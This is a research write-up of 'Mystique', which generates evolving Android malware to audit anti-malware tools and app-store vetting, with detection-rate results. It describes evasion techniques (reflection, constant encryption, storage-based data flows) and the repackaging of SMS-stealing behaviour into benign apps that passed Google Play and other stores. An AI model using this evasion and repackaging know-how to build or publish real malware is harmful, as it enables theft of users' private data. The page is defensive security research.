Mystique: Evolving Android Malware for Auditing Anti-Malware Tools

Auditing of AMTs

In this section, we aim to evaluate the AMT using the generated malware and test the four hypothesis.

First, we test the deployed AMTs on Genome malware as the baseline understanding of AMTs. Note that we only choose malware with privacy leakage attack, which contains 78% of the 1,260 samples in Genome . The results are presented in Table 1, where machine learning tools and anti-virus tools perform well in detecting existing malware. As the dataset Genome originated from 2010, anti-virus tools (AVTs), which are mainly based on signature and pattern matching, can accurately detect the malware with a recall of 71.9% on average. There are still some AVTs that perform poorly, e.g., Bkav (0%), CMC (0%), Malwarebytes (0%) and TheHacker (0%). Since machine learning tools use 60% of malware samples in Genome as the training set and the remaining 40% as the testing set, they outperform the other tools with a higher recall.

Table 1. Detection ratio of privacy leakage malware in Genome

Static analysis and dynamic analysis are more time-consuming compared to the previous two approaches, due to the program analysis they conduct. Static analysis tools has yet achieved around 48.4% of detection ratio of Genome malware. For the dynamic tool TaintDroid, it fails to detect existing malware in Genome. The problem is attributed to the limited support of TaintDroid to source or sink types, and the compatibility issues when running out-of-date malware in latest Android OS.

Second, we use Mystique to generate 100 generations of malware without evasion features to evaluate the detection ratio (DR) of AMTs. Then we add evasion features into the malicious apps to re-evaluate the DR. As shown in Table 2, there are two columns for each kind of AMTs, of which the first column is the DR without evasion features, and the second column “(E)” is the DR with evasion features. All the values of DRs are calculated as the average values amongst tools of a specific type. We summarize the hypothesis testing results as follows.

Table 2. The objective value of generated malware during evolution

H1. The Susceptibility of AVs to Unknown Malware. Mainstream AVs employ signature- or feature-based approaches. The detection capabilities depend on the completeness and timeliness of malware database, and also the abstraction of malware. Generally,they perform very well in detecting known malware as in Genome experiment above: they achieve a 71.9% recall on average, and 27 (out of 57) AVs can even detect at least 99% of malware samples in the experiment. However, they perform poorly in detecting our generated 0day malware. According to the detection results of our generated malware, only 6 generated malware samples (and totally 18 detection cases) can be detected by the union of these AVs as shown in Table 3. For example, ESET-NOD32 detects 3malware samples as “a variant of Android/TrojanSMS.Agent.BLY”. By further inspection, we find that the 3 samples steal the SMS messages. Specifically, they share one common behavior as below. It monitors the change of the Content Provider of SMS, steals all SMS messages, and sends out to a specific remote server.

CONTENT_OBSERVER::POINTCUT_ONCHANGE::SOURCE(SMS::ALL)→CONTENT_OBSERVER::POINTCUT_ONCHANGE::SINK(SMS::SEND_MESSAGE)

We can conclude that AVs have made efforts to infer the semantics of code as the behavior is split into two methods. However, the inference is quite limited. We crafted malware samples by employing evasion techniques, which cannot be detected any more. In general, we consider H1 is accepted.

Table 3. Detected malware samples and brief description for contained malicious behaviors

H2. The Insignificant Impact of Evasion Techniques. We have generated two malware datasets, one of which contains malware samples without any evasion features, and the other contains malware samples with arbitrary evasion features. From the comparison of detection results, evasion features rarely effect the detection results of AVs. It can help to evade the detection of dynamic and static analysis (43.7% of reduction in DR). Since the dynamic analysis tool TaintDroid tracks the flow of information in the system, it fails to detect the privacy leakage once the flow is complicated by involving ICC or implicit data flow. The static analysis tools that perform a code analysis from the source to sink, can overcome complicated

transformation attacks and behavior-level evasion techniques. For example, I CC TA takes into the account ICCs during different components of apps, can identify behaviors of privacy leakage occurring across multiple components. However, static analysis in IccTA still has some flaws. It cannot track the data flow across persistent storage, such as file, SQLite or shared preferences. Static analysis tools usually employ API-matching to identify sources and sinks. Therefore, they can be easily defeated by involving dynamic loading techniques, such as reflection, constant encryption. Moreover, for machine learning based tools, evasion features have a little impact on DR, which is not significant enough (the differences of ML and ML(E) in Table 2 are within 5%). We observe that the higher #EFs does not necessarily lead to a lower DR. Thus, we consider that H2 is partially accepted — certain evasion can only work for certain detection approaches and too many evasions may not better bypass the detection.

Table 4. The significance of attack features in detection

H3. Diverse Detection Capabilities of AMTs. Based on the detection results to our malware benchmark, we test H3 by evaluating the weakness and strength of each type of approaches.

Dynamic analysis is a kind of black box testing, which focuses on the input and output of sensitive information to apps, while they do not consider how the behavior is implemented. Therefore, the detection capabilities depend on the coverage of sources, sinks and the communication channels between. Our experiments show that T AINT D ROID can track sensitive information obtained from specific Android APIs, such as getDeviceId and getLine1Number. It does not track the information from incoming SMS message and Content Provider, etc. It performs well for the communication channel ICC and file-based channel. However, SQLite and shared preferences can help bypass its detection.
Static analysis is more scalable than dynamic analysis. However, it lacks of information during runtime and thereby its capabilities are limited. Nowadays, there are some works using symbolic execution to mitigate the lacking of runtime information.
We compare the detection results of two malware sets, one of which has more attack features and the other has less attack features. The dataset with more attack features are more likely to be detected, while machine learning based approaches are susceptible to malware with less attack features. Another comparison occur between two tools RevealDroid and Drebin. Although Drebin has considered more features, its detection ratio is improved a lot. Therefore, the significance, rather than the number, of features can better facilitate the detection. As shown in Table 4, we list five attack features which are easiest to be detected, and five attack features which are hardest to be detected.
It is reasonable for AVs to use a fast approach with a low false positive rate. Our observation is that AVs mainly aim at detecting known malware. Hence, AVs work in a reactive way, not in a proactive way.

To sum up, we consider that H3 should be rejected . Considering the detection results of TaintDroid in Table 2, we cannot confirm that dynamic tools can produce high detection accuracy, although they can provide more accurate information in detection. The problem lies in the difficulty in triggering malicious behaviors in execution. Note that due to the unavailability of other dynamic tools, we cannot generalize our conclusion for all dynamic tools.

H4. Strong Vetting Process in Modern App Stores. Modern Android app stores employ multiple techniques to inspect the submitted apps and protect their marketplaces. Google Play has turned from an offline dynamic analysis-Bouncer to a manual check by human experts. Currently, Android app stores GetJar, SlideMe, and TorrApk all inspect the submitted apps by human experts.

Figure 1. Malicious behaviors to be repackaged

Since our generated malware has no normal functionalities other than malicious behaviors, it got rejected when we submit it into these four app stores. To address this, we download three open-source benignware, which have been verified by AMTs and approved by Google Play. We inject our malicious behaviors into their source code, repackage them and then submit them to the four Android app stores. One example of malicious behaviors is shown in Fig. 1. And it acquires 5 permission and steals SMS messages and identity information of device into a particular server.

For each of the 3 benignware (benign base), we select 4 malware samples from our benchmark and inject them into the benign base.

Table 5: The capabilities of vetting process in modern marketplaces

Here are the 4 malware samples: 1) one malicious app without evasion features; 2) one malicious app is generated by adding evasion features into the first app; 3) an optimal malware sample in our benchmark. 4) a random choosen one from our malware benchmark. The 4 different malicious apps from the same benign base is submitted to the four different app stores. Table 5 shows the detection ratio of these apps by AMTs, ? and ? indicate an app is approved (not detected) and rejected (detected) by the corresponding app stores, respectively. From this experiment, we can conclude that the vetting process of Android app stores still have severe flaws, and can be easily bypassed. Although human inspection can judge the quality of apps of high confidence, the security of apps is not fully inspected.

According to our observations, we consider that H4 should be rejected . Note that the malware samples that are used for injection are with a ratio of 0% to 22.8% to be detected. Thus, the vetting results are not significantly better than the results of our AMTs. We suspect that the vetting process also uses the AMTs for detection.

The following figures show the proof of uploaded malware into Android marketplaces, and screenshots that show that our honeypots have collected the stolen information.

Figure 2. The uploaded malware sample in Google Play Figure 3. The uploaded malware sample in TorrApk

Figure 4. The collected stolen information by uploaded malware

Page updated

Google Sites

Report abuse